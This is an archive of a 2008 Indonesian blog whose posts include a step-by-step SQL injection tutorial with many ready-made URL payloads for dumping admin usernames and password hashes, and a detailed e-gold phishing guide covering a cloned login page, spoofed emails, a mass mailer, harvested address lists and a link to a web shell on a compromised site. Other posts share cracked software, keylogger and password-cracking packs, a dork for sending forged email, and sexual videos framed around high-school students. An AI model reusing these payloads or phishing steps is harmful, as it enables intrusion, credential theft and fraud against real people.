Saturday, November 15, 2008

3gp Anak SMU



lanjut mangggggggg ???


Ndak Jelas sih kata orang mah..? tapi bikin penasaran alias sange maning sudah umum dan menjadi pembahasan publik anak2 indonesia membicarakan sex. lebih baik langsung main ajha.. atau kalo mu liat tutorial nya boleh disini ada koq.. ?

Video 01
video 02
video 03
video 04
Video 05
Video 06
Video 07
Video 08
Video 09
Video 10
Video 11
Video 12

Selamat Menikmati ... ?

Friday, November 14, 2008

SQL Injection Tutorial

In this tutorial i will describe how sql injection works and how to
use it to get some useful information.


First of all: What is SQL injection?

It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).


1.SQL Injection (classic or error based or whatever you call it) :D

2.Blind SQL Injection (the harder part)


So let's start with some action :D


1). Check for vulnerability

Let's say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ' (quote),

and that would be http://www.site.com/news.php?id=5'

so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar

that means is vulrnable to sql injection :)

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result)

so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <-- no error

http://www.site.com/news.php?id=5 order by 2/* <-- no error

http://www.site.com/news.php?id=5 order by 3/* <-- no error

http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

so we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.

let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

i didn't see any paper covering this problem, so i must write it :)

what we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version :D

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)

we know that table admin exists...

now to check column names.


http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up :)

i.e md5 hash, mysql hash, sha1...

now we must complete query to look nice :)

for that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )


http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

when you have this, you can login like admin or some superuser :D

if can't guess the right table name, you can always try mysql.user (default)

it has user i password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

the first column is diplayed.

the second one (we change limit 0,1 to limit 1,1)

ie.


http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

the second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... :D

if you wanna display column names for specific table use this query. (where clause)

let's say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won't work if the magic quotes is ON.

let's say that we found colums user, pass and email.

now to complete query to put them all together :D

for that we use concat() , i decribe it earlier.

i.e


http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

what we get here is user:pass:email from table users.

example: admin:hash:whatever@blabla.com


That's all in this part, now we can proceed on harder part :)



2. Blind SQL Injection

Blind injection is a little more complicated the classic injection but it can be done :D

I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D

Let's start with advanced stuff.

I will be using our example

http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc...

then when we want to test it for blind sql injection attack

http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.

now the real test

http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.

1) Get the MySQL version

to get the version in blind attack we use substring

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.

replace 4 with 5, and if query return TRUE then the version is 5.

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works

when select don't work then we use subselect

i.e

http://www.site.com/news.php?id=5 and (select 1)=1

if page loads normally then subselects work.

then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names

This is part when guessing is the best friend :)

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name.

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess)

here we merge 1 with the column password, then substring returns the first character (,1,1)


4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users.

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value

and then compare it with simbol greater then > .

so if the ascii char greater then 80, the page loads normally. (TRUE)

we keep trying until we get false.


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)


http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

cause that makes you better SQL INJECTOR :D



Hope you learned something from this paper.


Have FUN! (:


To be continued and updated...

SQL Injection Tutorial by gibran354 (MySQL)

Tutorial phising e-gold account

Bila anda bingung dengan judul di atas, mungkin anda lebih familiar dengan kata-kata berikut : "Tutorial mencuri e-gold", "Tutorial hack e-gold". Tapi, saya sendiri kurang suka dengan kata-kata hack e-gold, karena terdengar kurang pantas saja bila menggunakan kata hack. Di tutorial ini, kita akan membuat situs e-gold yang palsu, dan kemudian mengundang para korban untuk login ke situs e-gold palsu milik kita sehingga semua data yang di-input oleh sang korban akan dikirim ke e-mail kita. Tutorial ini diutamakan untuk pemula, yang medium dan advanced -pun boleh membacanya walau hanya untuk sekedar menghabiskan waktu atau sekedar memaki tutorial ini (*atau penulisnya). Tutorial ini hanyalah sebagai pengetahuan semata, segala kerugian yang diakibatkan oleh artikel ini, bukan tanggung jawab penulis.
Hal-hal yang harus dipersiapkan kurang lebih sebagai berikut :

- Web Hosting / Host / PHP Shell / cPanel atau istilah lainnya yang mendukung PHP.
Banyak orang di luar sana yang menggunakan istilah demikian, cpanel, host, php shell atau apalah. Intinya yang kita butuhkan adalah sebuah web hosting dengan dukungan php. Beruntunglah bagi anda yang sering bermain-main dengan php shell, atau mungkin mengutak-atik web sendiri. Karena anda tidak perlu bersusah payah untuk menempatkan situs e-gold anda nantinya atau bila masih kesulitan, setidaknya tahu bagaimana cara mendapatkannya. Namun, jika anda yang masih kesulitan dan belum mengerti bagaimana untuk mendapatkan web hosting sebagai tempat situs e-gold palsu, sepertinya anda harus sedikit bekerja keras untuk mendapatkannya, bisa meminta, berusaha mencari sendiri, atau bagaimanalah. Tapi yang jelas, saya tidak akan memberitahu caranya secara detail di sini, karena sudah banyak situs-situs berbahasa indonesia yang menyediakan cara untuk mendapatkan php shell, cpanel dsb. Atau, anda bisa juga menggunakan CC (Credit Card) untuk memesan web host secara online. Atau cara lain ? Silahkan berfantasi dengan kreativitas anda. Dan jangan lupa, yang terpenting adalah mendukung PHP dan bisa digunakan untuk mengirim e-mail.
Nah, untuk menjebak korban masuk ke dalam lubang jebakan sudah dimulai. Lubang jebakannya sudah disiapkan, lalu ?

- E-gold scampage
Agar korban mau masuk ke dalam lubang jebakan yang kita buat, kita harus membuat lubang jebakan tersebut tidak terlihat seperti lubang jebakan, namun terlihat biasa saja. Kira-kira seperti itulah fungsi scampage ini, dan menurut pendapat pribadi scampage adalah duplikat dari situs asli dan mengedit beberapa bagian sesuai kebutuhan/penipuan atau simple-nya duplikasi situs untuk menipu. Scampage ini merupakan scampage bikinan saya sendiri (*makanya jelek), yang merupakan komposisi dari, situs asli www.e-gold.com, dan menggunakan beberapa campuran script dari scampage yang dibuat oleh phiser lain, namun tidak di-update sehingga tampilannya tidak lagi terlihat seperti situs asli.
Download e-gold scampage di :
http://geocities.com/th3sn0wbr4in/egoldscampage.zip
Setelah anda men-download egoldscampage.zip ke komputer anda, extract file egoldscampage.zip dan edit file login.php dan login1.php yang terletak di folder www.egold.comacct.
Pada bagian $to = "your@e-mail.com"; ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung accountID + password e-gold dari korban-korban anda. Begitu juga pada file login1.php, ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung e-mail + password si korban.
Simpan semua perubahan yang sudah anda lakukan, dan sekarang upload file egoldscampage.zip ke Web Hosting yang sudah anda siapkan sebelumnya dan extract file egoldscampage.zip di Web hosting anda.

- E-mail palsu
Anda memasuki zona terlarang!!! Lewat sini agar anda selamat - TTD, Warga Sekitar. Kira-kira seperti itulah papan yang terpampang ketika anda sedang melewati daerah asing. Orang yang belum mengenal betul daerah tersebut, pasti akan mengikuti petunjuk jalan yang diberikan, apalagi ada tanda bahwa informasi ini berasal dari orang sekitar. Bagi yang panik, tentu mereka tidak lagi berpikir panjang dan langsung mengikuti petunjuk yang ada, sehingga mereka terjebak ke dalam lubang yang kita buat.
Kurang lebih, begitulah fungsi si 'e-mail palsu'. Berikut ini adalah dua buah e-mail palsu yang mungkin bisa anda gunakan.
http://geocities.com/th3sn0wbr4in/gold-letter-1.txt
http://geocities.com/th3sn0wbr4in/gold-letter-2.txt

Untuk gold-letter-1.txt, ada bagian yang harus anda ubah sebelum e-mail tersebut dikirimkan ke korban.



Please update your records on or before October 5th, 2007.


Ganti October 5th, 2007 dengan tanggal 3-5 hari kemudian ketika anda mengirimkan e-mail palsu. Misalnya, anda mengirim e-mail tersebut pada tanggal 1 October 2007, anda ganti menjadi 3-5 hari ke depan sebagai tenggang waktu untuk sang korban.
Pada gold-letter tersebut, ada 4 bagian yaitu : From, Name, Subject, dan Message. Keempat-nya ini akan digunakan pada Inbox Mailer nanti. Jika anda ingin melihat preview e-mail tersebut, copy-paste Message dari letter tersebut ke notepad, dan save sebagai file html. Di setiap e-mail tersebut, terdapat sebuah link yang akan mengarahkan korban ke situs e-gold milik anda.
Contoh pada gold-letter-1.txt, jika anda melihat preview dari e-mail tersebut, isinya adalah demikian :

To update your E-gold records click on the following link:

https://www.e-gold.com/acct/login.html

Namun, bila anda melihat html code-nya, isinya adalah demikian :



To update your E-gold records click on the following link:



https://www.e-gold.com/acct/login.html






Jadi, link https://www.e-gold.com/acct/login.html sebenarnya mengarah ke http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html yang merupakan 'lubang jebakan' milik th3sn0wbr4in. Ganti http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html dengan alamat situs e-gold milik anda sendiri yang sudah anda persiapkan.

Berikut ini, contoh e-mail gold-letter-1 di inbox yahoo milik saya
http://i189.photobucket.com/albums/z55/ianis01/contentmailno4.png

- PHP Inbox Mass Mailer
Sayangnya, kedua gold-letter tersebut barulah desain. Selama e-mail tersebut masih berada di komputer lokal, tidak ada korban yang bisa melihatnya sehingga tidak satupun terjebak masuk ke dalam jebakan yang sudah anda siapkan. Agar 'para korban' melihat e-mail tersebut, anda harus mengirimkan e-mail ke korban.
Dan bila anda ingin korban anda 'melihat' e-mail tersebut, e-mail anda harus tiba di Inbox sang korban, bukan Bulk, Spam, Junk atau istilah lainnya, karena jarang korban yang mau melihat e-mail yang tiba di kategori-kategori tersebut (Bulk, Spam, Junk, etc) walaupun memang ada, tapi tidak banyak.
Karena itu, anda harus menggunakan PHP Inbox Mass Mailer, merupakan sebuah script PHP yang digunakan untuk mengirimkan e-mail secara massal ke korban.
Contoh tampilannya adalah sebagai berikut :
http://i189.photobucket.com/albums/z55/ianis01/mailergl3.png
Isi field Your Email, Your Name, Subject, dan Message seperti yang tertera pada gold-letter-1 atau gold-letter-2, tapi isi dengan gold-letter yang sudah anda edit.
Script php inbox mass mailer :
http://geocities.com/th3sn0wbr4in/mailer.txt
http://geocities.com/th3sn0wbr4in/mailer.arif.txt
Untuk script mailer.arif.txt, didapat dari teman yang original link-nya adalah
http://geocities.com/aliif_1604/run.txt

Agar anda bisa menggunakan PHP Inbox Mass Mailer, anda harus meng-upload-nya ke Web Hosting yang mendukung PHP dan mengirim mail. Sekarang bagaimana caranya agar e-mail tersebut masuk inbox, itu tergantung pada Web Hosting tempat anda meng-upload script mailer-nya. Tidak semua host yang bisa mengirim mail tapi tiba di inbox. Apalagi, kita menggunakan AccountRobot_donotreply@e-gold.com sebagai e-mail pengirim. Bagaimana caranya mengetahui apakah host bisa mengirim e-mail dan tiba di inbox ? Cukup upload script mailer, dan coba anda kirim ke e-mail anda sendiri. Apabila anda mendapatkan e-mail palsu anda tiba di inbox, berarti host tersebut layak digunakan untuk mengirim e-mail e-mail palsu ke korban. Pengalaman pribadi saya sendiri, bagian inilah yang paling sulit. Sejak beberapa tahun yang lalu saya sudah menyiapkan semua yang saya butuhkan untuk membuat jebakan ini, tapi selalu terhenti karena belum juga mendapatkan host yang layak untuk mengirimkan e-mail palsu ke korban. Awalnya saya pikir tidak mungkin mendapatkan host yang bisa mengubah alamat pengirim menjadi seperti AccountRobot_donotreply@e-gold.com. Tapi pada akhir tahun 2006, seorang teman yang memiliki Yahoo! ID tommyhacku memberikan saya sebuah host yang bisa melakukannya.
Jadi, selamat berjuang untuk mendapatkannya. Bila anda sudah mendapatkannya, saat-nya mengumpulkan daftar korban.

- E-mail list
Tentukan siapa korbanmu!!! Bagaimana mengetahui e-mail orang yang memiliki e-gold account?
- Cari dari forum-forum yang berbicara soal e-gold, paypal, atau business
- Cari dari situs-situs HYIP
Tapi sepertinya yang demikian itu cukup sulit. Jadi, kita tidak perlu e-mail yang mana yang mempunyai e-gold account. Masukkan saja semua daftar e-mail ke dalam field target di PHP Mailer. Beberapa cara yang bisa didapatkan untuk mendapatkan e-mail list :
- Beli lewat situs-situs yang menjualnya menggunakan CC. Anda bisa menggunakan keyword "buy e-mail leads" atau keyword lainnya lewat google. Silahkan dicoba-coba keyword lainnya.
- Menggunakan software e-mail extractor
Salah satu software yang terkenal untuk mengumpulkan e-mail adalah Tarantula.
Download software-nya di http://www.emailsmartz.com/downloads/tarantula.exe
Download Patch Tarantula di http://www.geocities.com/toemenggoeng/error/Patch-Tarantula-SG.zip
Jangan tanya saya untuk menggunakannya. Silahkan coba-coba sendiri

- Action!!!
Setelah semua siap, silahkan kirim e-mail palsu ke daftar korban lewat php mailer anda dan tunggu hasilnya di e-mail anda.

Secara simple, yang dibutuhkan adalah :
- Host, yang belum punya boleh nyoba http://modelbc.de/administrator/modules/index_page.php (c99 shell)
- Scampage, source : http://geocities.com/th3sn0wbr4in/egoldscampage.zip
- Mailer + Host utk Mailer, source : http://geocities.com/th3sn0wbr4in/mailer.txt
- Mail list

Menyewa film DVD tanpa harus repot mengembalikan lagi

Mungkin banyak yang tidak suka untuk menyewa DVD di toko penyewaan (DVD Rental store) karena repot apabila harus mengembalikannya kembali ke toko tersebut dan kadang membuat sedikit jengkel karena DVD yang kita cari sedang disewa orang lain.
Sebuah perusahaan bernama PortoMedia di Irlandia menemukan solusi terbaik untuk masalah ini.
Mereka membangun sebuah kios rental DVD yang menggunakan mesin layaknya sebuah ATM.
Untuk menyewa film favorit anda, cukup membawa USB Flash atau hardisk portable, download dan nonton.
Tentu saja anda harus membayar layaknya anda menyewa DVD di toko penyewaan DVD.
Tapi dengan cara ini, ada beberapa keuntungan yaitu anda tidak perlu takut bahwa DVD yang anda cari sedang disewa orang lain dan anda tidak perlu repot untuk mengembalikannya.
Dengan sistim proteksi, film yang sudah di download tidak dapat diputar kembali setelah beberapa waktu.

Invisible Secrets + With Crack



Keep those prying eyes out of your communications and prevent unwanted people from reading your private files!
Invisible Secrets 4 not only encrypts your data and files for safe keeping or for secure transfer across the net, it also hides them in places that on the surface appear totally innocent, such as picture or sound files, or web pages. These types of files are a perfect disguise for sensitive information. Using our file encryption software nobody, not even your wife, boss, or a hacker would realize that your important papers or letters are stored in your last holiday pictures, or that you use your personal web page to exchange messages or secret documents. With Invisible Secrets 4 - file encryption software you may encrypt and hide files directly from Windows Explorer, and then automatically transfer them by e-mail or via the Internet.

It features strong file encryption algorithms (including AES - Rijndael), a password management solution that stores all your passwords securely and helps you create secure passwords, a shredder that helps you destroy beyond recovery files, folders and internet traces, a locker that allows you to password protect certain applications, the ability to create self-decrypting packages and mail them to your friends or business partners, a tool that allows you to transfer a password securely over the internet, and a cryptboard to help you use the program from Windows Explorer. Invisible Secrets 4 - File encryption software is shell integrated and offers a wizard that guides you through all the necessary steps needed to protect your data.

Cryptography:
File and folder encryption using 8 strong encryption algorithms (AES - Rijndael, Twofish, RC 4, Cast128, GOST, Diamond 2, Sapphire II, Blowfish).

Steganography:
Hides your sensitive data into innocent files, so nobody can find them. Features five innocent carriers for hiding: JPEG, PNG, BMP, HTML and WAV.

Email Encryption:
Possibility to create a package with encrypted content and to send it by e-mail.

Password manager - Random password generator
With Invisible Secrets 4 you can store passwords in encrypted password lists and you can also generate real-random passwords.

File Shredder:
An integrated Shredder (DoD 5220.22-M compliant) to destroy files and folders beyond recovery.

Application Locker:
An Application Locker to password protect any application installed on your computer.

IP-to-IP Password Transfer
Allows the secure transfer of passwords between two computers using an encrypted internet line.

Virtual Keyboard:
The virtual keyboard was created in order to prevent any key logger software from stealing your passwords.

Cryptboard:
A Shell Integrated Cryptboard - use it like a basket for storing file names and make various operations on them in a single step

Real-time News System


It will allow you to be kept up-to-date with new versions, new products, new features, and special offers, without having to browse our website
searching for new information. You will instantly get the news from us.


You Can Download Here

Aneka Software Hacking

Sebenarnya ada banyak sekali software hacking yang saya punya. Tapi sebagian besar filenya berukuran besar. Jadi uploadnya sedikit demi sedikit saja. Ini ada
beberapa yang mungkin bisa berguna bagi yang suka nyoba hacking-hackingan. Lain kali kalau koneksinya lebih baik, akan saya saya upload lagi. Hari ini koneksi internet sedang buruk sekali dan sangat lambat. Jadinya hanya bisa upload sedikit. Harap maklum....
Bagi teman-teman yang punya software dan mau berbagi link download silakan posting saja url Anda di bagian komentar.
Silakan download software-software hacking berikut ini:

Paket Software Hacking

Paket Software Hacking 2
Paket Software Hacking 3
Paket Software Keylogger
Tools IP address
Paket Software Hacking 4
Pembobol Password 1
Pembobol Password 2
Paket Software Hacking 5
Paket Software Hacking 6

Selamat mendownload...Lain kali saya berikan software-software yang lainnya.

Akses internet bebas tanpa blokir

Saya pribadi mendukung UU ITE yang bertujuan untuk kemajuan bangsa dan rakyat Indonesia, terutama untuk mengangkat martabat bangsa Indonesia di dunia Internet.
Saya pribadi sangat tidak mendukung UU ITE jika digunakan sebagai alat untuk memeras atau sebagai alat pembodohan masyarakat oleh (ke/a)parat.
Adalah suatu tindakan yang sangat bodoh jika ingin membunuh tikus di dalam lumbung dengan cara membakar lumbung tersebut. Demikian juga jika memblok suatu situs hanya karena sebuah content yang kontroversial. blokirnya saat ini sudah dibuka kembali dan hanya diblokir URL-nya bukan seluruh situsnya
Informasi yang saya bagi disini hanyalah sebagai bahan pembelajaran. Harap digunakan secara baik dan bertanggung jawab.
Langsung saja ke pokok permasalahan, yaitu bagaimana caranya mengakses internet dengan bebas tanpa blokir. Ada banyak cara untuk memblokir suatu situs di internet, salah duanya yaitu:
1.Memblok pada DNS server sehingga nama domain tersebut tidak dikenal atau tidak bisa diakses sehingga selalu muncul tulisan “Looking for….” setelah beberapa lama akan muncul “Server not found”
2.Memblok content atau isi situs tersebut sehingga jika kita mengakses selalu keluar tulisan “Wating for….” sampe tua, tanpa keluar2 isi dari situs tersebut
Untuk mendapatkan akses internet bebas tanpa blokir jika ISP Anda hanya memblok melalui DNS Server-nya mudah saja. Pindahkan saja setting DNS Server di komputer Anda ke DNS Server lain, ke OpenDNS misalnya. Untuk petunjuk cara mengubah setting DNS Server Anda, silahkan lihat tulisan saya sebelumnya atau klik di sini.
Untuk mendapatkan akses internet bebas tanpa blokir jika ISP Anda memblok dengan cara ke-2 juga sebenarnya tidak susah juga. Rahasianya adalah dengan menggunakan akses VPN. Untuk account VPN Anda bisa dapatkan di sini, yang berlaku selama 30 hari sejak pemakaian pertama. Setelah mendapatkan username dan password, Anda harus membuat koneksi VPN-nya.
Berikut ini adalah langkah-langkah membuat koneksi VPN, diasumsikan bahwa Anda menggunakan Windows XP dan terkonek langsung ke Internet baik melalui Router atau langsung ke modem. Dan juga diasumsikan Anda tidak menggunakan proxy.
Cara membuat koneksi VPN dengan PPTP:
1. Klik ke “Control Panel” -> “Network Connection“
2. Pilih “Create new connection“
3. Klik “Next“
4. Pilih “Connect to the network at myworkplace” lalu klik “Next“
5. Pilih “Virtual private network connection” lalu klik “Next“
6. Pada kolom “Company name“, isikan “net2vpn” lalu klik “Next“
7. Pilih “Do not dial the initial connection” lalu klik “Next“
8. Pada kolom “Host name or IP address” isikan “shareus.net2vpn.com” lalu klik “Next“
9. Pilih “Add a shortcut to this connection to my desktop” lalu klik “Finish“
10. Masukkan username dan password yang telah Anda beli, lalu pilih “Save this username & password for the following users/my user” lalu klik “Properties“
11. Pilih tab “Security“
12. Pilih “Advance” lalu klik tombol “Settings“
13. Dari “Data encryption” menu, pilih “Optional encryption” lalu pilih “Allow these protocols” pilih “Challenge handshake authentication protocol(chap)” lalu tekan “OK“
14. Klik “OK“, lalu klik “Yes“
15. Jika Anda ingin berselancar bebas tanpa blokir, jalankan koneksi net2vpn sebelum mulai berselancar.
Cara membuat koneksi VPN dengan L2TP:
1. Klik ke “Control Panel” -> “Network Connection“
2. Pilih “Create new connection“
3. Klik “Next“
4. Pilih “Connect to the network at myworkplace” lalu klik “Next“
5. Pilih “Virtual private network connection” lalu klik “Next“
6. Pada kolom “Company name“, isikan “net2vpn” lalu klik “Next“
7. Pilih “Do not dial the initial connection” lalu klik “Next“
8. Pada kolom “Host name or IP address” isikan “shareus.net2vpn.com” lalu klik “Next“
9. Pilih “Add a shortcut to this connection to my desktop” lalu klik “Finish“
10. Masukkan username dan password yang telah Anda beli, lalu pilih “Save this username & password for the following users/my user” lalu klik “Properties“
11. Pilih tab “Security“
12. Pilih “Typical” dan pada kolom “Validate my identity as follow” pilih “Require secured password” lalu klik tombol “IPSec Settings“
13. Pilih “Use pre-shared key for authentication” lalu pada kolom “Key” isi dengan “8870680” lalu tekan “OK“
14. Sekarang klik tab “Networking” dan pada kolom “Type of VPN” pilih “L2TP IPSEC VPN” lalu tekan tombol “OK“
15. Jika Anda ingin berselancar bebas tanpa blokir, jalankan koneksi net2vpn sebelum mulai berselancar.

Apa beda koneksi L2TP dan PPTP ?
Saya sendiri kurang jelas, tapi sepertinya koneksi L2TP lebih secure karena menggunakan pre-shared key. Tapi ada beberapa provider internet di Indonesia yang tidak bisa menggunakan koneksi VPN dengan metode L2TP, karena mungkin diblok oleh mereka baik secara sengaja atau tidak sengaja.

Jadi lebih baik pakai L2TP atau PPTP ?

Disarankan menggunakan metode koneksi L2TP, tapi jika tidak berhasil yah mau tidak mau harus pakai koneksi PPTP.
Pakai proxy yang gratis kan juga bisa, kenapa repot2 pakai VPN ?
Memang pakai proxy gratisan juga bisa, tapi takutnya semua traffic data di log oleh adminnya. Sehingga sangat tidak aman jika Anda melakukan transaksi online atau jika Anda meng-input username dan password pada suatu situs. Lagi pula kan VPN ada kelebihannya, yaitu ter-enkripsi.
VPN gratisan juga ada ?
Ya, VPN gratisan juga ada. Jawabannya idem seperti diatas. Terserah Anda juga mau pakai yang gratis atau bayar. Toh saya hanya menyarankan saja. Tidak memaksa. Untuk VPN gratis silahkan lihat tulisan saya yang terbaru setelah tulisan ini. Atau klik disini.
Omong-omong VPN apaan sih ?
VPN atau Virtual Private Network adalah semacam “terowongan” yang aman (terenkripsi) yang menghubungkan koneksi dari komputer Anda ke server VPN. Tujuannya adalah agar data yang ditransfer /diterima tidak dapat dibaca oleh pihak ketiga. Orang lain tidak akan tahu dari mana Anda mengakses internet karena IP Address yang muncul nantinya adalah IP dari server VPN tersebut. Untuk lebih lengkapnya bisa dilihat di http://id.wikipedia.org/wiki/VPN.

Mau beli account net2vpn dimana ?
Bisa dibeli di GubraK.com dengan harga diskon Rp. 33.000,- untuk akses 30 hari yang dihitung dari pertama pemakaian atau bisa beli langsung juga ke net2vpn dengan harga US$ 5 untuk akses sama 30 hari.

Aduh, repot nih langkah2-nya! Boleh bantu settingin komputer saya ?
Boleh aja, selama Anda ada di Jakarta. Saya bisa bantu untuk setting komputer Anda dengan biaya tertentu tentunya. Tidak mahal2 kok, asal buat ganti ongkos bensin, keringat dan waktu saya aja. Silahkan hubungi saya dari menu di atas.

Mau coba sendiri tapi masih bingung nih ?
Tidak usah bingung2, silahkan hubungi lewat YM saya saja oke... broo..


Selamat mencoba !
WARNING! dengan menggunakan metode OPENDNS dan VPN maka akses internet Anda terbuka bebas termasuk bisa mengakses situs-situs pornografi yang nantinya akan diblok juga karena UU ITE. Oleh karena itu saya sarankan Anda untuk menggunakan software Filter Internet sendiri yang bisa didapatkan GRATIS pada situs-situs ini: Parental Control Bar, Naomi dan Chat Controller untuk mengatur aplikasi chatting.

Email setan

cara ngirim email palsu ke email orang, mayan ne bwat ngerjain orang
cari aja di google dengan keyword :
inurl:XcCDONTS.asp (ada salah satu yang masih aktif cari sendiri yeeee)
aku sudah buktiin sendiri bo’
hasilnya emang bener2 yahuut bgt
artikel ini bukan untuk 7an merusak ato neko2 tapi hanya untuk pengetahuan….Ok
try it’s

Selamat Berjuang

Do not only YouTube for video tutorial do not only you tube but…

Here are some useful links about Video Tutorial that I’ve found on the Internet. Actually, there are many kind of video in free video sharing sites like youtube. In Indonesia, there are several video sharing sites like Video Indonesia.sc and Layar Tancap.com
1. Warrior of the Net (How internet work Illustrated)
